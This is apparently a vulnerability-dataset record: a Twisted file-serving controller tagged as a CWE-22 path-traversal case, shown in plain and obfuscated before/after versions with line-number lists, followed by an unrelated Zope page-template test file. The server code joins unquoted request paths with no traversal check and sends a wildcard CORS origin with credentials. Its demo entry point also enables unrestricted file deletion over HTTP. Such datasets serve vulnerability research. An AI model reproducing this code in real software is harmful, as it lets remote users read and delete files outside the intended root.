if "recursive" in request.args:
generator = self._walk(path)
if generator is None:
generator = self._glob(path)
for item in generator:
if os.path.isdir(item):
response_data['dirs'].append(item)
else:
response_data['files'].append(item)
return self._json_response(request, response_data)
def render_file(self, request, path):
"""
Return the contents of file *path*.
Args:
request (twisted.web.server.Request): HTTP request object
path: file path
Returns:
HTTP response with headers
"""
(_, ext) = os.path.splitext(path)
if ext in self.never_gzip_extensions:
# hack: remove gzip from the list of supported encodings
acceptHeaders = request.requestHeaders.getRawHeaders(
'accept-encoding', [])
supported = ','.join(acceptHeaders).split(',')
request.requestHeaders.setRawHeaders(
'accept-encoding', list(set(supported) - {'gzip'}))
result = twisted.web.static.File(
path, defaultType="application/octet-stream")
return result.render(request)
def render_GET(self, request):
"""
HTTP GET request handler returning
* legacy response if the query *file* or *dir* parameter is set
* file contents if *request.path* contains a file path
* directory listing if *request.path* contains a folder path
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
attic_args = {'file', 'dir'}
if len(attic_args & set(request.args.keys())) >= 1:
return self.render_legacy(request)
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.render_path_listing(request, target_path)
else:
return self.render_file(request, target_path)
def render_POST(self, request):
"""
HTTP POST request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_PUT(self, request):
"""
HTTP PUT request handler (currently NOT implemented).
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
return self.error_response(request, response_code=http.NOT_IMPLEMENTED)
def render_DELETE(self, request):
"""
HTTP DELETE request handler which may try to delete a file if its
path's prefix is in :py:data:`FileController._delete_whitelist` and
:py:data:`FileController._do_delete` is True.
Args:
request (twisted.web.server.Request): HTTP request object
Returns:
HTTP response with headers
"""
request.setHeader(
'Access-Control-Allow-Origin', CORS_DEFAULT_ALLOW_ORIGIN)
try:
target_path = self._existing_path_or_bust(request)
except ValueError as vexc:
return self.error_response(
request, response_code=http.BAD_REQUEST, message=vexc.message)
except IOError as iexc:
return self.error_response(
request, response_code=http.NOT_FOUND, message=iexc.message)
if os.path.isdir(target_path):
return self.error_response(
request, response_code=http.NOT_IMPLEMENTED,
message='Will not remove folder {!r}'.format(target_path))
for prefix in self._delete_whitelist:
if not target_path.startswith(os.path.abspath(prefix)):
return self.error_response(request,
response_code=http.FORBIDDEN)
response_data = self.get_response_data_template(request)
try:
response_data['result'] = True
if self._do_delete:
os.unlink(target_path)
message = 'Removed {!r}'.format(target_path)
else:
message = 'WOULD remove {!r}'.format(target_path)
response_data['message'] = message
except Exception as eexc:
response_data['message'] = 'Cannot remove {!r}: {!s}'.format(
target_path, eexc.message)
request.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(request, response_data)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
# standard factory example
factory_s = Site(FileController(DEFAULT_ROOT_PATH))
# experimental factory
root = Resource()
root.putChild("/", FileController)
root.putChild("/file", FileController)
factory_r = Site(root)
# experimental factory: enable gzip compression
wrapped = EncodingResourceWrapper(
FileController(
root=DEFAULT_ROOT_PATH,
# DANGER, WILL ROBINSON! These values allow deletion of ALL files!
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
factory_s_gz = Site(wrapped)
reactor.listenTCP(18888, factory_s_gz)
reactor.run()
| path_disclosure | {
"code": [
"MANY_SLASHES_PATTERN = r'[\\/]+'",
"MANY_SLASHES_REGEX = re.compile(MANY_SLASHES_PATTERN)"
],
"line_no": [
48,
49
]
} | {
"code": [
"from utilities import MANY_SLASHES_REGEX"
],
"line_no": [
46
]
} |
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
import file
VAR_0 = r'[\/]+'
VAR_1 = re.compile(VAR_0)
VAR_2 = os.path.abspath(os.path.dirname(__file__))
VAR_3 = [
'Content-Type',
]
VAR_4 = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
VAR_5 = '*'
VAR_6 = {
'Access-Control-Allow-Origin': VAR_5,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(VAR_4),
'Access-Control-Allow-Headers': ', '.join(VAR_3)
}
VAR_7 = [
'/media',
]
class CLASS_0(twisted.web.resource.Resource):
VAR_8 = True
VAR_9 = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
VAR_10 = '/file'
VAR_11 = os.path.abspath(os.path.dirname(__file__))
VAR_12 = False
VAR_13 = VAR_7
VAR_14 = ('.ts',)
def __init__(self, *VAR_15, **VAR_16):
if VAR_15:
for VAR_40, value in zip(self._override_args, VAR_15):
VAR_16[VAR_40] = value
for arg_name in self._override_args:
if VAR_16.get(arg_name) is not None:
VAR_35 = '_{:s}'.format(arg_name)
setattr(self, VAR_35, VAR_16.get(arg_name))
self.session = VAR_16.get("session")
def FUNC_0(self, VAR_17, VAR_18):
VAR_17.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(VAR_18, indent=2)
def FUNC_1(self, VAR_17):
VAR_27 = None
if VAR_17.path.startswith(self._resource_prefix):
VAR_27 = VAR_17.path[len(self._resource_prefix):]
VAR_28 = {
"_request": {
"path": VAR_17.path,
"uri": VAR_17.uri,
"method": VAR_17.method,
"postpath": VAR_17.postpath,
"file_path": VAR_27,
},
"result": False,
}
return VAR_28
def FUNC_2(self, VAR_17, VAR_19=None, **VAR_16):
if VAR_19 is None:
VAR_19 = http.INTERNAL_SERVER_ERROR
VAR_28 = self.get_response_data_template(VAR_17)
VAR_28.update(**VAR_16)
VAR_28['me'] = dict()
for arg_name in self._override_args:
VAR_35 = '_{:s}'.format(arg_name)
VAR_28['me'][VAR_35] = getattr(self, VAR_35)
VAR_17.setResponseCode(VAR_19)
return self._json_response(VAR_17, VAR_28)
def FUNC_3(self, VAR_17):
VAR_29 = urlparse.unquote(VAR_17.path)
if not VAR_29.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(VAR_17.path))
VAR_27 = os.path.join(
self._root, VAR_29[len(self._resource_prefix) + 1:])
VAR_27 = re.sub(VAR_1, '/', VAR_27)
if not os.path.exists(VAR_27):
raise IOError("Not Found {!r}".format(VAR_27))
return VAR_27
def FUNC_4(self, VAR_17):
for VAR_40 in VAR_6:
VAR_17.setHeader(VAR_40, VAR_6[VAR_40])
return ''
def FUNC_5(self, VAR_17):
return file.FileController().render(VAR_17)
def FUNC_6(self, VAR_20, VAR_21='*'):
if VAR_20 == '/':
VAR_36 = '/' + VAR_21
else:
VAR_36 = '/'.join((VAR_20, VAR_21))
return glob.iglob(VAR_36)
def FUNC_7(self, VAR_20):
for VAR_23, dirs, files in os.walk(VAR_20):
for dir_item in dirs:
yield os.path.join(VAR_23, dir_item)
for file_item in files:
yield os.path.join(VAR_23, file_item)
def FUNC_8(self, VAR_17, VAR_20):
VAR_28 = self.get_response_data_template(VAR_17)
VAR_28.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
VAR_30 = None
if "pattern" in VAR_17.args:
VAR_30 = self._glob(VAR_20, VAR_17.args["pattern"][0])
if "recursive" in VAR_17.args:
VAR_30 = self._walk(VAR_20)
if VAR_30 is None:
VAR_30 = self._glob(VAR_20)
for item in VAR_30:
if os.path.isdir(item):
VAR_28['dirs'].append(item)
else:
VAR_28['files'].append(item)
return self._json_response(VAR_17, VAR_28)
def FUNC_9(self, VAR_17, VAR_20):
(VAR_31, VAR_32) = os.path.splitext(VAR_20)
if VAR_32 in self.never_gzip_extensions:
VAR_37 = VAR_17.requestHeaders.getRawHeaders(
'accept-encoding', [])
VAR_38 = ','.join(VAR_37).split(',')
VAR_17.requestHeaders.setRawHeaders(
'accept-encoding', list(set(VAR_38) - {'gzip'}))
VAR_33 = twisted.web.static.File(
VAR_20, defaultType="application/octet-stream")
return VAR_33.render(VAR_17)
def FUNC_10(self, VAR_17):
VAR_34 = {'file', 'dir'}
if len(VAR_34 & set(VAR_17.args.keys())) >= 1:
return self.render_legacy(VAR_17)
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
try:
VAR_39 = self._existing_path_or_bust(VAR_17)
except ValueError as vexc:
return self.error_response(
VAR_17, VAR_19=http.BAD_REQUEST, VAR_41=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_17, VAR_19=http.NOT_FOUND, VAR_41=iexc.message)
if os.path.isdir(VAR_39):
return self.render_path_listing(VAR_17, VAR_39)
else:
return self.render_file(VAR_17, VAR_39)
def FUNC_11(self, VAR_17):
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
return self.error_response(VAR_17, VAR_19=http.NOT_IMPLEMENTED)
def FUNC_12(self, VAR_17):
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
return self.error_response(VAR_17, VAR_19=http.NOT_IMPLEMENTED)
def FUNC_13(self, VAR_17):
VAR_17.setHeader(
'Access-Control-Allow-Origin', VAR_5)
try:
VAR_39 = self._existing_path_or_bust(VAR_17)
except ValueError as vexc:
return self.error_response(
VAR_17, VAR_19=http.BAD_REQUEST, VAR_41=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_17, VAR_19=http.NOT_FOUND, VAR_41=iexc.message)
if os.path.isdir(VAR_39):
return self.error_response(
VAR_17, VAR_19=http.NOT_IMPLEMENTED,
VAR_41='Will not remove folder {!r}'.format(VAR_39))
for prefix in self._delete_whitelist:
if not VAR_39.startswith(os.path.abspath(prefix)):
return self.error_response(VAR_17,
VAR_19=http.FORBIDDEN)
VAR_28 = self.get_response_data_template(VAR_17)
try:
VAR_28['result'] = True
if self._do_delete:
os.unlink(VAR_39)
VAR_41 = 'Removed {!r}'.format(VAR_39)
else:
VAR_41 = 'WOULD remove {!r}'.format(VAR_39)
VAR_28['message'] = VAR_41
except Exception as eexc:
VAR_28['message'] = 'Cannot remove {!r}: {!s}'.format(
VAR_39, eexc.message)
VAR_17.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(VAR_17, VAR_28)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
VAR_22 = Site(CLASS_0(VAR_2))
VAR_23 = Resource()
VAR_23.putChild("/", CLASS_0)
VAR_23.putChild("/file", CLASS_0)
VAR_24 = Site(VAR_23)
VAR_25 = EncodingResourceWrapper(
CLASS_0(
VAR_23=VAR_2,
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
VAR_26 = Site(VAR_25)
reactor.listenTCP(18888, VAR_26)
reactor.run()
|
import os
import json
import glob
import re
import urlparse
import twisted.web.static
from twisted.web import http
from utilities import MANY_SLASHES_REGEX
import file
VAR_0 = os.path.abspath(os.path.dirname(__file__))
VAR_1 = [
'Content-Type',
]
VAR_2 = ['GET', 'PUT', 'POST', 'DELETE', 'OPTIONS']
VAR_3 = '*'
VAR_4 = {
'Access-Control-Allow-Origin': VAR_3,
'Access-Control-Allow-Credentials': 'true',
'Access-Control-Max-Age': '86400',
'Access-Control-Allow-Methods': ','.join(VAR_2),
'Access-Control-Allow-Headers': ', '.join(VAR_1)
}
VAR_5 = [
'/media',
]
class CLASS_0(twisted.web.resource.Resource):
VAR_6 = True
VAR_7 = (
'resource_prefix', 'root', 'do_delete', 'delete_whitelist')
VAR_8 = '/file'
VAR_9 = os.path.abspath(os.path.dirname(__file__))
VAR_10 = False
VAR_11 = VAR_5
VAR_12 = ('.ts',)
def __init__(self, *VAR_13, **VAR_14):
if VAR_13:
for VAR_38, value in zip(self._override_args, VAR_13):
VAR_14[VAR_38] = value
for arg_name in self._override_args:
if VAR_14.get(arg_name) is not None:
VAR_33 = '_{:s}'.format(arg_name)
setattr(self, VAR_33, VAR_14.get(arg_name))
self.session = VAR_14.get("session")
def FUNC_0(self, VAR_15, VAR_16):
VAR_15.setHeader("content-type", "application/json; charset=utf-8")
return json.dumps(VAR_16, indent=2)
def FUNC_1(self, VAR_15):
VAR_25 = None
if VAR_15.path.startswith(self._resource_prefix):
VAR_25 = VAR_15.path[len(self._resource_prefix):]
VAR_26 = {
"_request": {
"path": VAR_15.path,
"uri": VAR_15.uri,
"method": VAR_15.method,
"postpath": VAR_15.postpath,
"file_path": VAR_25,
},
"result": False,
}
return VAR_26
def FUNC_2(self, VAR_15, VAR_17=None, **VAR_14):
if VAR_17 is None:
VAR_17 = http.INTERNAL_SERVER_ERROR
VAR_26 = self.get_response_data_template(VAR_15)
VAR_26.update(**VAR_14)
VAR_26['me'] = dict()
for arg_name in self._override_args:
VAR_33 = '_{:s}'.format(arg_name)
VAR_26['me'][VAR_33] = getattr(self, VAR_33)
VAR_15.setResponseCode(VAR_17)
return self._json_response(VAR_15, VAR_26)
def FUNC_3(self, VAR_15):
VAR_27 = urlparse.unquote(VAR_15.path)
if not VAR_27.startswith(self._resource_prefix):
raise ValueError("Invalid Request Path {!r}".format(VAR_15.path))
VAR_25 = os.path.join(
self._root, VAR_27[len(self._resource_prefix) + 1:])
VAR_25 = re.sub(MANY_SLASHES_REGEX, '/', VAR_25)
if not os.path.exists(VAR_25):
raise IOError("Not Found {!r}".format(VAR_25))
return VAR_25
def FUNC_4(self, VAR_15):
for VAR_38 in VAR_4:
VAR_15.setHeader(VAR_38, VAR_4[VAR_38])
return ''
def FUNC_5(self, VAR_15):
return file.FileController().render(VAR_15)
def FUNC_6(self, VAR_18, VAR_19='*'):
if VAR_18 == '/':
VAR_34 = '/' + VAR_19
else:
VAR_34 = '/'.join((VAR_18, VAR_19))
return glob.iglob(VAR_34)
def FUNC_7(self, VAR_18):
for VAR_21, dirs, files in os.walk(VAR_18):
for dir_item in dirs:
yield os.path.join(VAR_21, dir_item)
for file_item in files:
yield os.path.join(VAR_21, file_item)
def FUNC_8(self, VAR_15, VAR_18):
VAR_26 = self.get_response_data_template(VAR_15)
VAR_26.update(
{
'result': True,
'dirs': [],
'files': [],
}
)
VAR_28 = None
if "pattern" in VAR_15.args:
VAR_28 = self._glob(VAR_18, VAR_15.args["pattern"][0])
if "recursive" in VAR_15.args:
VAR_28 = self._walk(VAR_18)
if VAR_28 is None:
VAR_28 = self._glob(VAR_18)
for item in VAR_28:
if os.path.isdir(item):
VAR_26['dirs'].append(item)
else:
VAR_26['files'].append(item)
return self._json_response(VAR_15, VAR_26)
def FUNC_9(self, VAR_15, VAR_18):
(VAR_29, VAR_30) = os.path.splitext(VAR_18)
if VAR_30 in self.never_gzip_extensions:
VAR_35 = VAR_15.requestHeaders.getRawHeaders(
'accept-encoding', [])
VAR_36 = ','.join(VAR_35).split(',')
VAR_15.requestHeaders.setRawHeaders(
'accept-encoding', list(set(VAR_36) - {'gzip'}))
VAR_31 = twisted.web.static.File(
VAR_18, defaultType="application/octet-stream")
return VAR_31.render(VAR_15)
def FUNC_10(self, VAR_15):
VAR_32 = {'file', 'dir'}
if len(VAR_32 & set(VAR_15.args.keys())) >= 1:
return self.render_legacy(VAR_15)
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
try:
VAR_37 = self._existing_path_or_bust(VAR_15)
except ValueError as vexc:
return self.error_response(
VAR_15, VAR_17=http.BAD_REQUEST, VAR_39=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_15, VAR_17=http.NOT_FOUND, VAR_39=iexc.message)
if os.path.isdir(VAR_37):
return self.render_path_listing(VAR_15, VAR_37)
else:
return self.render_file(VAR_15, VAR_37)
def FUNC_11(self, VAR_15):
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
return self.error_response(VAR_15, VAR_17=http.NOT_IMPLEMENTED)
def FUNC_12(self, VAR_15):
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
return self.error_response(VAR_15, VAR_17=http.NOT_IMPLEMENTED)
def FUNC_13(self, VAR_15):
VAR_15.setHeader(
'Access-Control-Allow-Origin', VAR_3)
try:
VAR_37 = self._existing_path_or_bust(VAR_15)
except ValueError as vexc:
return self.error_response(
VAR_15, VAR_17=http.BAD_REQUEST, VAR_39=vexc.message)
except IOError as iexc:
return self.error_response(
VAR_15, VAR_17=http.NOT_FOUND, VAR_39=iexc.message)
if os.path.isdir(VAR_37):
return self.error_response(
VAR_15, VAR_17=http.NOT_IMPLEMENTED,
VAR_39='Will not remove folder {!r}'.format(VAR_37))
for prefix in self._delete_whitelist:
if not VAR_37.startswith(os.path.abspath(prefix)):
return self.error_response(VAR_15,
VAR_17=http.FORBIDDEN)
VAR_26 = self.get_response_data_template(VAR_15)
try:
VAR_26['result'] = True
if self._do_delete:
os.unlink(VAR_37)
VAR_39 = 'Removed {!r}'.format(VAR_37)
else:
VAR_39 = 'WOULD remove {!r}'.format(VAR_37)
VAR_26['message'] = VAR_39
except Exception as eexc:
VAR_26['message'] = 'Cannot remove {!r}: {!s}'.format(
VAR_37, eexc.message)
VAR_15.setResponseCode(http.INTERNAL_SERVER_ERROR)
return self._json_response(VAR_15, VAR_26)
if __name__ == '__main__':
from twisted.web.resource import Resource, EncodingResourceWrapper
from twisted.web.server import Site, GzipEncoderFactory
from twisted.internet import reactor
VAR_20 = Site(CLASS_0(VAR_0))
VAR_21 = Resource()
VAR_21.putChild("/", CLASS_0)
VAR_21.putChild("/file", CLASS_0)
VAR_22 = Site(VAR_21)
VAR_23 = EncodingResourceWrapper(
CLASS_0(
VAR_21=VAR_0,
do_delete=True, delete_whitelist=[]
),
[GzipEncoderFactory()])
VAR_24 = Site(VAR_23)
reactor.listenTCP(18888, VAR_24)
reactor.run()
| [
1,
2,
6,
10,
13,
16,
19,
21,
23,
25,
27,
29,
31,
33,
35,
42,
45,
47,
50,
51,
53,
54,
58,
59,
61,
62,
64,
65,
73,
74,
78,
79,
89,
93,
107,
113,
118,
127,
132,
141,
152,
154,
158,
168,
171,
176,
179,
184,
196,
200,
203,
205,
209,
211,
213,
221,
223,
229,
236,
243,
250,
254,
269,
273,
276,
279,
285,
287,
291,
299,
301,
307,
310,
312,
316,
320,
327,
330,
333,
342,
347,
351,
360,
364,
373,
379,
387,
396,
401,
406,
420,
422,
423,
428,
429,
431,
432,
437,
438,
442,
447,
450,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
102,
103,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
129,
130,
131,
132,
133,
134,
135,
136,
137,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
217,
218,
225,
226,
227,
228,
229,
230,
231,
232,
233,
234,
252,
253,
254,
255,
256,
257,
258,
259,
260,
289,
290,
291,
292,
293,
294,
295,
296,
297,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
324,
325,
349,
350,
351,
352,
353,
354,
355,
356,
362,
363,
364,
365,
366,
367,
368,
369,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384
] | [
1,
2,
6,
10,
13,
16,
19,
21,
23,
25,
27,
29,
31,
33,
35,
42,
45,
48,
49,
51,
52,
56,
57,
59,
60,
62,
63,
71,
72,
76,
77,
87,
91,
105,
111,
116,
125,
130,
139,
150,
152,
156,
166,
169,
174,
177,
182,
194,
198,
201,
203,
207,
209,
211,
219,
221,
227,
234,
241,
248,
252,
267,
271,
274,
277,
283,
285,
289,
297,
299,
305,
308,
310,
314,
318,
325,
328,
331,
340,
345,
349,
358,
362,
371,
377,
385,
394,
399,
404,
418,
420,
421,
426,
427,
429,
430,
435,
436,
440,
445,
448,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
89,
90,
91,
92,
93,
94,
95,
96,
97,
98,
99,
100,
101,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
127,
128,
129,
130,
131,
132,
133,
134,
135,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
205,
206,
207,
208,
209,
210,
211,
212,
213,
214,
215,
216,
223,
224,
225,
226,
227,
228,
229,
230,
231,
232,
250,
251,
252,
253,
254,
255,
256,
257,
258,
287,
288,
289,
290,
291,
292,
293,
294,
295,
312,
313,
314,
315,
316,
317,
318,
319,
320,
321,
322,
323,
347,
348,
349,
350,
351,
352,
353,
354,
360,
361,
362,
363,
364,
365,
366,
367,
373,
374,
375,
376,
377,
378,
379,
380,
381,
382
] |
0CWE-22
| import unittest
from AccessControl import safe_builtins
from zope.component.testing import PlacelessSetup
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
